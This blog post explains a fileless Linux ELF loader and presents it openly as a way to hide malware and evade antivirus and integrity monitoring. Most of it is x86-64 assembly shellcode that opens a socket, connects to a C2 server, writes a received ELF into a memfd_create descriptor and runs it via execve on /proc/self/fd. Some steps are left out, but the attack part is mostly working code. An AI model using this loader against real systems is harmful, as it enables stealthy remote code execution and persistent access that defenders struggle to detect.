Post

Remote in-memory ELF loader

Remote in-memory ELF loader

Fileless malware distribution is gaining popularity. What is not surprisingly, because the work of such programs leaves almost no traces. Moreover, since the very beginning hackers always searched for ways to stay anonymous and hide their malware on the system. Thats why we focused on deep diving into this subject and came with the idea. In Windows, there is Reflective DLL Injection which allows to execute malware right into the memory of the compromised process, but on Linux there is no such existing implementation. So, then we thought, why not to use different ways of executing ELF files?

We found out that there is a technique of creating temporary filesystem using /dev/shm, but this actually does not provide us what we want. Out goal is to execute ELF file right into the memory, not from the disk. And then, after reading this very interesting article we decided to improve method described in it. As we all know it is possible to create different file descriptor and write data to it. This file descriptor will appear in /proc/<pid/fd/<fd> and then can be executed as a file.

Fortunately, procfs does not exist on disk and kernel creates it in the memory which is a good thing for us:

1
2
The /proc filesystem contains a illusionary filesystem.
It does not exist on a disk. Instead, the kernel creates it in memory.

3.7. The /proc filesystem

So, the concept of the whole process is:

1. Read ELF data from socket 2. Map it into the memory 3. Write to the created file descriptor 4. Execute it from /proc/self/fd/<fd>

Shellcode

Let’s begin writing our shellcode.

First step is to set up socket for further communication:

1
2
3
4
5
6
7
8
9
10
11
12
13
.equ SYS_SOCKET     0x29
.equ AF_INET        0x2
.equ SOCK_STREAM    0x1

_sys_socket:
    push SYS_SOCKET
    pop rax
    cdq
    push AF_INET
    pop rdi
    push SOCK_STREAM
    pop rsi
    syscall

Now, we are ready to connect to our C2 server:

1
2
3
4
5
6
7
8
9
10
_sys_connect:
    xchg rdi, rax
    movabs rcx, C2_ADDR
    push rcx
    mov rsi, rsp
    push 0x10
    pop rdx
    push 0x2a
    pop rax
    syscall

Lets imagine that we now read ELF file length and have it in the r12 register. Moreover, we have already allocated memory using mmap and have address pointing to it in r15. Then, we have already read ELF data to the allocated memory and the next step is to create file descriptor. For this purpose we are gonna use memfd_create system call:

1
2
3
4
5
6
7
8
9
10
11
12
13
.equ SYS_MEMFD 0x13f
.equ FILE_SIZE 0x8

_sys_memfd:
    xor rax, rax
    push rax
    push rsp
    sub rsp, FILE_SIZE
    mov rdi, rsp
    push SYS_MEMFD
    pop rax
    xor rsi, rsi
    syscall

Then we save our file descriptor to r14 via push rax; pop r14 and then we need to write our ELF data from the allocated memory right to the file descriptor. After all these steps done, we need to concatenate /proc/self/fd/ and our file descriptor. There are different ways to do this, but in our case we’ll use stack:

1
2
3
4
5
add rsp, 16
mov qword ptr [rsp], 0x6f72702f
mov qword ptr [rsp+4], 0x65732f63
mov qword ptr [rsp+8], 0x662f666c
mov qword ptr [rsp+12], 0x002f64

Then we need to convert our file descriptor to the string and append it to the stack above. We’ll pass this step.

Now, we are ready to execute our file descriptor using execve:

1
2
3
4
5
6
7
8
9
10
11
.equ SYS_EXECVE 0x3b

_sys_execve:
    lea rdi, [rsp]
    push SYS_EXECVE
    pop rax
    cdq
    push rdx
    push rdi
    mov rsi, rsp
    syscall

First instruction puts path /proc/self/fd/<fd> to the first argument of execve.

As the result, we’ll get our ELF file executed. And we didn’t even touch the disk!

Conclusion

Fileless loading of ELF files in Linux is a useful technique when doing penetration testing. This is a fairly quiet way to resist a wide range of anti-virus protection, control systems integrity and monitoring systems that monitor content changes hard drive. In this way, access to the target can be easily maintained. system, leaving a minimum of traces.

This post is licensed under CC BY 4.0 by the author.